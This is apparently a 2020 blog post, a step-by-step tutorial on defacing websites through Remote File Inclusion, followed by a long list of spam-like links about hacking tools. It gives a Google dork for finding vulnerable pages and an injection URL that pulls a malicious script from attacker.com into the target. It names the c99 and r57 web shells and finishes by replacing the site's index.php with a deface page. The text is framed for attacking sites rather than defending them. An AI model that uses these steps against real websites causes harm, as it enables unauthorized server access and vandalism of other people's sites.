Friday, August 28, 2020

HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

Remote File Inclusion (RFI) is a technique that allows the attacker to upload a malicious code or file on a website or server. The vulnerability exploits the different sort of validation checks in a website and can lead to code execution on server or code execution on the website. This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of the tutorial, I suppose you will know what it is all about and may be able to deploy an attack.
RFI is a common vulnerability. All the website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and play almost anything with the server. Why it put a red alert to the websites, just because of that you only need to have your common sense and basic knowledge of PHP to execute malicious code. BASH might come handy as most of the servers today are hosted on Linux.

SO, HOW TO HACK A WEBSITE OR SERVER WITH RFI?

First of all, we need to find out an RFI vulnerable website. Let's see how we can find one.
As we know finding a vulnerability is the first step to hack a website or server. So, let's get started and simply go to Google and search for the following query.
inurl: "index.php?page=home"
At the place of home, you can also try some other pages like products, gallery and etc.
If you already a know RFI vulnerable website, then you don't need to find it through Google.
Once we have found it, let's move on to the next step. Let's see we have a following RFI vulnerable website.
http://target.com/index.php?page=home
As you can see, this website pulls documents stored in text format from the server and renders them as web pages. Now we can use PHP include function to pull them out. Let's see how it works.
http://target.com/index.php?page=http://attacker.com/maliciousScript.txt
I have included my malicious code txt URL at the place of home. You can use any shell for malicious scripts like c99, r57 or any other.
Now, if it's a really vulnerable website, then there would be 3 things that can happen.
  1. You might have noticed that the URL consisted of "page=home" had no extension, but I have included an extension in my URL, hence the site may give an error like 'failure to include maliciousScript.txt', this might happen as the site may be automatically adding the .txt extension to the pages stored in server.
  2. In case, it automatically appends something in the lines of .php then we have to use a null byte '' in order to avoid error.
  3. Successful execution.
As we get the successful execution of the code, we're good to go with the shell. Now we'll browse the shell for index.php. And will replace the file with our deface page.

Related links


  1. Hacking Tools Download
  2. Hacks And Tools
  3. Tools For Hacker
  4. Pentest Tools Online
  5. Blackhat Hacker Tools
  6. Pentest Tools Nmap
  7. Pentest Tools Online
  8. How To Make Hacking Tools
  9. Pentest Tools Review
  10. Pentest Tools Website
  11. Pentest Tools Bluekeep
  12. Hacker
  13. Hacker Techniques Tools And Incident Handling
  14. Hacking Tools For Beginners
  15. Hacks And Tools
  16. Best Hacking Tools 2019
  17. Top Pentest Tools
  18. What Is Hacking Tools
  19. Pentest Tools Website Vulnerability
  20. Hacker Tools For Pc
  21. Blackhat Hacker Tools
  22. Hacking Apps
  23. Hacker Tools Github
  24. Hacking Tools For Windows 7
  25. What Are Hacking Tools
  26. Hacking Tools Name
  27. Pentest Tools Windows
  28. Install Pentest Tools Ubuntu
  29. Hacking Tools
  30. Hack Tools For Pc
  31. Best Hacking Tools 2020
  32. Growth Hacker Tools
  33. Hack Tools Online
  34. Hack Tools Github
  35. Pentest Tools Subdomain
  36. Hacking Tools For Windows 7
  37. Nsa Hacker Tools
  38. Hacking Tools Github
  39. Install Pentest Tools Ubuntu
  40. Hackrf Tools
  41. Hacker Tools Linux
  42. Hack Tool Apk
  43. Hack Tools Pc
  44. Hacking Tools 2020
  45. Hacker Tools Windows
  46. Usb Pentest Tools
  47. Hacking Apps
  48. Hacking Tools Github
  49. Wifi Hacker Tools For Windows
  50. Hacker Techniques Tools And Incident Handling
  51. Pentest Tools Linux
  52. Physical Pentest Tools
  53. Hacking Tools For Games
  54. Pentest Tools Port Scanner
  55. Hacking Tools Mac
  56. Hacking Tools Hardware
  57. Hacking Tools For Kali Linux
  58. Hacking Tools And Software
  59. Hacking Apps

No comments:

Post a Comment